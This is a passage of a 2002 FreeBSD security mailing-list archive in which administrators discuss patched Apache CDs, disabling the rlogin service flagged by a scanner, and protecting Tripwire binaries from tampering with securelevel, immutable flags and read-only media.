project of this sort are in the same boat as we= ll. If this is really something that the FreeBSD community is willing to go for= ward with, a team should be formed to decide how to best tackle this undert= aking. Since we're starting to get a little offtopic here, I'll stop spamming -sec= urity with this thread. If anyone wishes to discuss this with me any furth= er, I'd be happy to communicate off-list. Cheers, --=20 Kameron Gasso PGP key at http://blort.org/~kgasso/pgpkey.txt (PS: Brett, yes, the idea for the domain was originally ripped from Don Mar= tin's work for MAD. Good call... -k) --ibTvN161/egqYuK8 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE9D2aARa4UJDpmZqQRAlHfAJ9GGdBCMPGs2iG3/LeZAgxm17BH4ACfc/7i gyotyncJxVyEj3SqZ9nBYsw= =Kl8c -----END PGP SIGNATURE----- --ibTvN161/egqYuK8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 10:36:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id A6F8437B405; Tue, 18 Jun 2002 10:36:08 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5IHZw101024; Tue, 18 Jun 2002 12:35:58 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5IHZw315121; Tue, 18 Jun 2002 12:35:58 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5IHZs615114; Tue, 18 Jun 2002 12:35:54 -0500 (CDT) Message-ID: <3D0F6F7A.936C1C0E@centtech.com> Date: Tue, 18 Jun 2002 12:35:54 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: kgasso@blort.org Cc: Brett Glass , Sheldon Hearn , security@freebsd.org, freebsd-chat@freebsd.org Subject: Re: CDs with patched Apache? MOVING TO -CHAT References: <7957.1024403108@axl.seasidesoftware.co.za> <3D0F3010.A9F0995A@centtech.com> <4.3.2.7.2.20020618094300.03202e50@localhost> <20020618095736.A89330@blort.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Kameron Gasso wrote: > Seriously though, a project like this would require someone with both enough knowledge and enough free time to head it up. I know that with a full-time job and attempting to spend time with friends and family, I'm not left with much time available for things of this sort - and I'm sure other people who would love to pursue a project of this sort are in the same boat as well. > > If this is really something that the FreeBSD community is willing to go forward with, a team should be formed to decide how to best tackle this undertaking. > > Since we're starting to get a little offtopic here, I'll stop spamming -security with this thread. If anyone wishes to discuss this with me any further, I'd be happy to communicate off-list. > Well, since I threw the idea out there, I am more than willing to lead it, and of course work on it. Either way, I'm working on it. Anyone else? Eric [thread moved to -chat!] -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology Torque, it makes the world go 'round. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 12:33:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from krypton.delete.org (krypton.delete.org [209.15.179.208]) by hub.freebsd.org (Postfix) with ESMTP id F2FDC37B405 for ; Tue, 18 Jun 2002 12:33:29 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by krypton.delete.org (Postfix) with ESMTP id 416DA2C942F for ; Tue, 18 Jun 2002 15:22:54 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by krypton.delete.org (Postfix) with ESMTP id 670782C942E for ; Tue, 18 Jun 2002 15:22:53 -0400 (EDT) Date: Tue, 18 Jun 2002 15:22:53 -0400 (EDT) From: Alex Michlin To: freebsd-security@freebsd.org Subject: Disable Login Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS snapshot-20010714 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have a FreeBSD 4.2 server with a bug in login. I cannot reboot the server to upgrade the os (make world...). As a temporary fix, can I chmod 000 logon or possibly even remove it completely? Should everything function correctly? (OpenSSH mainly)? TIA, Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 12:44:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id E132D37B444 for ; Tue, 18 Jun 2002 12:44:06 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5IJdB9g039678; Tue, 18 Jun 2002 15:39:16 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Alex Michlin'" , Subject: RE: Disable Login Date: Tue, 18 Jun 2002 14:43:14 -0500 Message-ID: <001c01c21700$664e94e0$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What kind of a bug in login are you seeing? If you completely disable the login utility, you would not be able to logon locally, which could make an upgrade difficult. If you simply want to disable logon for specific users, simply set their shell to /etc/nologin or some other non-existent file/shell. HTH Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Alex Michlin Sent: Tuesday, June 18, 2002 2:23 PM To: freebsd-security@FreeBSD.ORG Subject: Disable Login I have a FreeBSD 4.2 server with a bug in login. I cannot reboot the server to upgrade the os (make world...). As a temporary fix, can I chmod 000 logon or possibly even remove it completely? Should everything function correctly? (OpenSSH mainly)? TIA, Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 13:19:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from krypton.delete.org (krypton.delete.org [209.15.179.208]) by hub.freebsd.org (Postfix) with ESMTP id B43F037B40B for ; Tue, 18 Jun 2002 13:19:33 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by krypton.delete.org (Postfix) with ESMTP id B89272C942F; Tue, 18 Jun 2002 16:08:57 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by krypton.delete.org (Postfix) with ESMTP id C1D1B2C942E; Tue, 18 Jun 2002 16:08:56 -0400 (EDT) Date: Tue, 18 Jun 2002 16:08:56 -0400 (EDT) From: Alex Michlin To: Eric F Crist Cc: freebsd-security@FreeBSD.ORG Subject: RE: Disable Login In-Reply-To: <001c01c21700$664e94e0$77fe180c@armageddon> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS snapshot-20010714 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I remember seeing a FreeBSD advisory on a bug in login. Now, for the real story... What is behind this is: I just downloaded the latest Saint version and ran it against a server. It said there login was vunerable. I'm not sure how it knows if there is a bug or just information (but it is listed under the critical section). Thanks again, Alex On Tue, 18 Jun 2002, Eric F Crist wrote: > What kind of a bug in login are you seeing? If you completely disable > the login utility, you would not be able to logon locally, which could > make an upgrade difficult. If you simply want to disable logon for > specific users, simply set their shell to /etc/nologin or some other > non-existent file/shell. > > HTH > > Eric F Crist > President/Sys Admin > AdTech Integrated Systems, Inc > http://www.adtechintegrated.com > > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Alex Michlin > Sent: Tuesday, June 18, 2002 2:23 PM > To: freebsd-security@FreeBSD.ORG > Subject: Disable Login > > I have a FreeBSD 4.2 server with a bug in login. I cannot reboot the > server to upgrade the os (make world...). As a temporary fix, can I > chmod > 000 logon or possibly even remove it completely? Should everything > function correctly? (OpenSSH mainly)? > > TIA, > > Alex > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 13:43:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id 442EA37B40B for ; Tue, 18 Jun 2002 13:43:44 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id 30879471DA; Tue, 18 Jun 2002 13:43:43 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id 220CEFDA0; Tue, 18 Jun 2002 13:43:39 -0700 (PDT) Message-ID: <3D0F9B7B.93FEBB49@pantherdragon.org> Date: Tue, 18 Jun 2002 13:43:39 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Alex Michlin Cc: Eric F Crist , freebsd-security@FreeBSD.ORG Subject: Re: Disable Login References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Alex Michlin wrote: > > I remember seeing a FreeBSD advisory on a bug in login. Now, for the > real story... What is behind this is: I just downloaded the latest Saint > version and ran it against a server. It said there login was vunerable. > I'm not sure how it knows if there is a bug or just information (but it is > listed under the critical section). What was the login method? Telnet? SSH? rsh? I just looked at the entire list of FreeBSD advisories going back to 1996 and there aren't any for login (login is a specific program). What was the advisory number? There have been FreeBSD advisories on both telnet and ssh, perhaps that's what you saw? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 14:11:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by hub.freebsd.org (Postfix) with ESMTP id 16C5D37B407 for ; Tue, 18 Jun 2002 14:11:14 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by cactus.fi.uba.ar (8.11.6/8.11.6) with ESMTP id g5IL8rQ69019; Tue, 18 Jun 2002 18:09:00 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Tue, 18 Jun 2002 18:08:53 -0300 (ART) From: Fernando Gleiser X-X-Sender: To: Alex Michlin Cc: Subject: RE: Disable Login In-Reply-To: Message-ID: <20020618175353.F68133-100000@localhost> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 18 Jun 2002, Alex Michlin wrote: > I remember seeing a FreeBSD advisory on a bug in login. Now, for the > real story... What is behind this is: I just downloaded the latest Saint > version and ran it against a server. It said there login was vunerable. > I'm not sure how it knows if there is a bug or just information (but it is > listed under the critical section). saint checks wheter the login *service* (512/tcp, a.k.a rlogin) is runing, it doesn't check for vulnerabilities in the login *program* (/usr/bin/login) rlogin is insecure because it sends everyting in cleartext and may be vulnerable to ip spoofing if you use .rhosts for authentication. Just coment it out in inetd.conf and use ssh instead. Fer > > Thanks again, > > Alex > > On Tue, 18 Jun 2002, Eric F Crist wrote: > > > What kind of a bug in login are you seeing? If you completely disable > > the login utility, you would not be able to logon locally, which could > > make an upgrade difficult. If you simply want to disable logon for > > specific users, simply set their shell to /etc/nologin or some other > > non-existent file/shell. > > > > HTH > > > > Eric F Crist > > President/Sys Admin > > AdTech Integrated Systems, Inc > > http://www.adtechintegrated.com > > > > > > -----Original Message----- > > From: owner-freebsd-security@FreeBSD.ORG > > [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Alex Michlin > > Sent: Tuesday, June 18, 2002 2:23 PM > > To: freebsd-security@FreeBSD.ORG > > Subject: Disable Login > > > > I have a FreeBSD 4.2 server with a bug in login. I cannot reboot the > > server to upgrade the os (make world...). As a temporary fix, can I > > chmod > > 000 logon or possibly even remove it completely? Should everything > > function correctly? (OpenSSH mainly)? > > > > TIA, > > > > Alex > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 16:28: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from maxlor.mine.nu (c-213-160-32-54.customer.ggaweb.ch [213.160.32.54]) by hub.freebsd.org (Postfix) with SMTP id F13C437B408 for ; Tue, 18 Jun 2002 16:28:01 -0700 (PDT) Received: (qmail 65528 invoked by uid 92); 18 Jun 2002 23:27:54 -0000 Received: from merlin.intranet (HELO ?10.0.0.16?) (10.0.0.16) by midgard.intranet with SMTP; 18 Jun 2002 23:27:54 -0000 Date: Wed, 19 Jun 2002 01:27:51 +0200 From: Maxlor To: freebsd-security@freebsd.org Subject: preventing tampering with tripwire Message-ID: <27700541.1024450071@[10.0.0.16]> X-Mailer: Mulberry/2.2.1 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After being rooted recently (no idea how it happened - I was following the SAs and whatnot... and yes, I already formatted and reinstalled), I decided to install tripwire, so I would be alerted to something like that sooner. The thing installed fine and is running ok, there's just this one thing thats puzzling me: How do I prevent an intruder that somehow gains root on my machine from simply replacing the tripwire binary that always gives me an "everything ok" report? I've been considering putting the binary on a floppy or CD, but then an intruder could simply unmount the disk and place the replacement binaries in the mountpoint dir. I'm currently running tripwire as a nightly cronjob, and I'd rather not resort to mounting a disk, running tripwire from it manually, then unmounting it. You know, my lazyness and the effort needed to do this would lead to me eventually no longer doing it... So, how did you solve this problem? Greetings Maxlor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 16:42: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from tesla.foo.is (tesla.reverse-bias.org [217.151.166.96]) by hub.freebsd.org (Postfix) with ESMTP id 84AFF37B408 for ; Tue, 18 Jun 2002 16:41:46 -0700 (PDT) Received: from there (eniac.foo.is [192.168.1.25]) by tesla.foo.is (Postfix) with SMTP id D1F422744; Tue, 18 Jun 2002 23:41:39 +0000 (GMT) Content-Type: text/plain; charset="iso-8859-1" From: Baldur Gislason To: Maxlor Subject: Re: preventing tampering with tripwire Date: Tue, 18 Jun 2002 23:40:20 +0000 X-Mailer: KMail [version 1.3.2] References: <27700541.1024450071@[10.0.0.16]> In-Reply-To: <27700541.1024450071@[10.0.0.16]> Cc: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020618234139.D1F422744@tesla.foo.is> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org use kern.securelevel 1 or higher and man chflags, set the tripwire binary schg so it cannot be tampered with. Of course there's no such thing as absolute security, but this moves you just a step closer. Unless the intruder performs a reboot and makes his changes before the kernel securelevel is raised on boot. Baldur On Tuesday 18 June 2002 23:27, you wrote: > After being rooted recently (no idea how it happened - I was following the > SAs and whatnot... and yes, I already formatted and reinstalled), I decided > to install tripwire, so I would be alerted to something like that sooner. > > The thing installed fine and is running ok, there's just this one thing > thats puzzling me: > > How do I prevent an intruder that somehow gains root on my machine from > simply replacing the tripwire binary that always gives me an "everything > ok" report? > > I've been considering putting the binary on a floppy or CD, but then an > intruder could simply unmount the disk and place the replacement binaries > in the mountpoint dir. > > I'm currently running tripwire as a nightly cronjob, and I'd rather not > resort to mounting a disk, running tripwire from it manually, then > unmounting it. You know, my lazyness and the effort needed to do this would > lead to me eventually no longer doing it... > > So, how did you solve this problem? > > Greetings > Maxlor > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 16:50:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id EB49237B40B for ; Tue, 18 Jun 2002 16:50:04 -0700 (PDT) Date: Tue, 18 Jun 2002 19:49:59 -0400 From: Klaus Steden To: Maxlor Cc: freebsd-security@FreeBSD.ORG Subject: Re: preventing tampering with tripwire Message-ID: <20020618194958.K99167@cthulu.compt.com> References: <27700541.1024450071@[10.0.0.16]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <27700541.1024450071@[10.0.0.16]>; from mail@maxlor.com on Wed, Jun 19, 2002 at 01:27:51AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Read-only media is a good thing, too. It may be overkill (in the case of security, is there such a thing, though?), but you could re-purpose an old disk drive, add security tools you want to it, and jumper it read-only. That wouldn't necessarily prevent your database from being compromised, but your tools would be intact. With a read-only disk, I would ... - install the security tools you want on it - generate any baseline configuration data and signatures - make the disk physically read-only - run your nightly cron jobs, comparing your daily results against your read-only baseline. Of course, every time you upgrade something, you'll have to unjumper the disk, update your signatures, and rejumper it, but that's not really such a big deal when compared with what else you might have to do. :> Keeping known good copies of essential programs (ls, find, dd, netstat, route, ifconfig, mv, cp, df, etc.) on the read-only media is a good idea, too. You could accomplish this with CDROMs if you don't want to use a disk drive, but you lose the option of rewritability. hope this helps, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 17:12:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from maxlor.mine.nu (c-213-160-32-54.customer.ggaweb.ch [213.160.32.54]) by hub.freebsd.org (Postfix) with SMTP id 76A1A37B40B for ; Tue, 18 Jun 2002 17:12:42 -0700 (PDT) Received: (qmail 65758 invoked by uid 92); 19 Jun 2002 00:12:35 -0000 Received: from merlin.intranet (HELO ?10.0.0.16?) (10.0.0.16) by midgard.intranet with SMTP; 19 Jun 2002 00:12:35 -0000 Date: Wed, 19 Jun 2002 02:12:33 +0200 From: Maxlor To: Baldur Gislason Cc: "freebsd-security@freebsd.org" Subject: Re: preventing tampering with tripwire Message-ID: <30381786.1024452753@[10.0.0.16]> In-Reply-To: <20020618234139.D1F422744@tesla.foo.is> References: <20020618234139.D1F422744@tesla.foo.is> X-Mailer: Mulberry/2.2.1 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org As I read that, I thought "Doh". Thats really pretty much the ideal solution... And if an attacker has physical access to my machine, well, he can do pretty much anything he wants anyway. Thanks! --On Dienstag, 18. Juni 2002 23:40 +0000 Baldur Gislason wrote: > use kern.securelevel 1 or higher and man chflags, set the tripwire binary > schg so it cannot be tampered with. Of course there's no such thing as > absolute security, but this moves you just a step closer. Unless the > intruder performs a reboot and makes his changes before the kernel > securelevel is raised on boot. > > Baldur To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 17:16: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10108.mail.yahoo.com (web10108.mail.yahoo.com [216.136.130.58]) by hub.freebsd.org (Postfix) with SMTP id E920037B40F for ; Tue, 18 Jun 2002 17:15:52 -0700 (PDT) Message-ID: <20020619001552.79019.qmail@web10108.mail.yahoo.com> Received: from [68.5.49.41] by web10108.mail.yahoo.com via HTTP; Tue, 18 Jun 2002 17:15:52 PDT Date: Tue, 18 Jun 2002 17:15:52 -0700 (PDT) From: twig les Subject: Re: preventing tampering with tripwire To: Klaus Steden , Maxlor Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020618194958.K99167@cthulu.compt.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You can also write a script to grab the signature of the tripwire binary itself from a remote server. A co-worker of mine is doing something like this right now and I'll ask him about it, but my gut says it'll be hush-hush secret. Don't forget to direct syslog output to a line printer BTW. ;) --- Klaus Steden wrote: > Read-only media is a good thing, too. > > It may be overkill (in the case of security, is > there such a thing, though?), > but you could re-purpose an old disk drive, add > security tools you want to it, > and jumper it read-only. That wouldn't necessarily > prevent your database from > being compromised, but your tools would be intact. > > With a read-only disk, I would ... > > - install the security tools you want on it > - generate any baseline configuration data and > signatures > - make the disk physically read-only > - run your nightly cron jobs, comparing your daily > results against your > read-only baseline. > > Of course, every time you upgrade something, you'll > have to unjumper the disk, > update your signatures, and rejumper it, but that's > not really such a big > deal when compared with what else you might have to > do. :> > > Keeping known good copies of essential programs (ls, > find, dd, netstat, route, > ifconfig, mv, cp, df, etc.) on the read-only media > is a good idea, too. > > You could accomplish this with CDROMs if you don't > want to use a disk drive, > but you lose the option of rewritability. > > hope this helps, > Klaus > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 18:27:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from pintail.mail.pas.earthlink.net (pintail.mail.pas.earthlink.net [207.217.120.122]) by hub.freebsd.org (Postfix) with ESMTP id 201DE37B406 for ; Tue, 18 Jun 2002 18:27:33 -0700 (PDT) Received: from user-2inivba.dialup.mindspring.com ([165.121.125.106] helo=earthlink.net) by pintail.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17KUFv-0001DL-00 for security@FreeBSD.ORG; Tue, 18 Jun 2002 18:27:32 -0700 Message-ID: <3D0FDE0D.2040100@earthlink.net> Date: Tue, 18 Jun 2002 18:27:41 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: CDs with patched Apache? References: <200206180539.XAA26264@lariat.org> <200206180539.XAA26264@lariat.org> <4.3.2.7.2.20020618033604.00d42aa0@localhost> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: > At 12:31 AM 6/18/2002, Kameron Gasso wrote: > > >>Wasn't the fact that -RELEASE branches don't get updated with new packages already discussed extensively in the not-so-distant past? > > > Some folks yelled at me for pointing it out, but alas there was no > real discussion of how to solve the problem. > > >>Although it wouldn't be very glamorous (and I certainly wouldn't reccommend it), the port installed with the latest -RELEASE could be "broken" so it wouldn't download and install without someone forcing it. Still, this wouldn't really encourage them to upgrade their ports tree - it'd more than likely just cause much swearing and force people to work around the problem. > > > It'd still be a warning. Hmmm.... Maybe the warning could be made part > of pkg_add, and/or something that pkg_add executed. It would simply say, > "proceed at your own risk!" > > But if you were installing from CD, you wouldn't be warned. Unless.... > Unless pkg_add phoned home to check on the package. Which is possible > if the machine can be connected to the Net. > This is probably not feasible. I for one when installing from CD do not network the machine until I have done a bunch of other things first to secure it. That is why I use CD's beyond it being quicker and more reliable is so I can setup a box in a secure environment (Not networked). Plus the idea of the CD is to not need/require a network connection. Honestly I never use the CD packages since they will be outdated by the time I use it. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 18:33:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from harrier.mail.pas.earthlink.net (harrier.mail.pas.earthlink.net [207.217.120.12]) by hub.freebsd.org (Postfix) with ESMTP id B5A6037B401 for ; Tue, 18 Jun 2002 18:33:45 -0700 (PDT) Received: from user-2inivba.dialup.mindspring.com ([165.121.125.106] helo=earthlink.net) by harrier.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17KULn-0004AK-00; Tue, 18 Jun 2002 18:33:35 -0700 Message-ID: <3D0FDF77.8020703@earthlink.net> Date: Tue, 18 Jun 2002 18:33:43 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Fernando Gleiser Cc: Alex Michlin , freebsd-security@FreeBSD.ORG Subject: Re: Disable Login References: <20020618175353.F68133-100000@localhost> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Fernando Gleiser wrote: > On Tue, 18 Jun 2002, Alex Michlin wrote: > > >>I remember seeing a FreeBSD advisory on a bug in login. Now, for the >>real story... What is behind this is: I just downloaded the latest Saint >>version and ran it against a server. It said there login was vunerable. >>I'm not sure how it knows if there is a bug or just information (but it is >>listed under the critical section). > > > saint checks wheter the login *service* (512/tcp, a.k.a rlogin) is runing, > it doesn't check for vulnerabilities in the login *program* (/usr/bin/login) > > rlogin is insecure because it sends everyting in cleartext and may be > vulnerable to ip spoofing if you use .rhosts for authentication. > Just coment it out in inetd.conf and use ssh instead. > > > Fer > > >>Thanks again, >> >>Alex >> >>On Tue, 18 Jun 2002, Eric F Crist wrote: >> >> >>>What kind of a bug in login are you seeing? If you completely disable >>>the login utility, you would not be able to logon locally, which could >>>make an upgrade difficult. If you simply want to disable logon for >>>specific users, simply set their shell to /etc/nologin or some other >>>non-existent file/shell. >>> >>>HTH >>> >>>Eric F Crist >>>President/Sys Admin >>>AdTech Integrated Systems, Inc >>>http://www.adtechintegrated.com >>> >>> >>>-----Original Message----- >>>From: owner-freebsd-security@FreeBSD.ORG >>>[mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Alex Michlin >>>Sent: Tuesday, June 18, 2002 2:23 PM >>>To: freebsd-security@FreeBSD.ORG >>>Subject: Disable Login >>> >>>I have a FreeBSD 4.2 server with a bug in login. I cannot reboot the >>>server to upgrade the os (make world...). As a temporary fix, can I >>>chmod >>>000 logon or possibly even remove it completely? Should everything >>>function correctly? (OpenSSH mainly)? >>> You can disable Login being used by ssh...edit the /etc/ssh/sshd_config file UseLogin must be set to no. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 20:57:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id EAB9437B406 for ; Tue, 18 Jun 2002 20:57:22 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA09237; Tue, 18 Jun 2002 21:57:09 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook 